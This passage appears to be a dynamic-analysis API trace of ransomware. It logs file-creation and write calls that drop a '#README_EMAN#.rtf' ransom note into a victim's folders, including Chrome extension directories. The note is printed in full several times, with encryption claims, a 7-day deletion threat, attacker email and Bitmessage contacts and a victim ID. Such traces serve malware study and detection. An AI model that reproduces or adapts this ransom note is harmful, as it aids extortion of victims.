way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0287.032] WriteFile (in: hFile=0x2f0, lpBuffer=0x2462bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0287.032] CloseHandle (hObject=0x2f0) returned 1 [0287.032] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0287.032] GetLastError () returned 0x2 [0287.032] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0287.626] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.626] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use 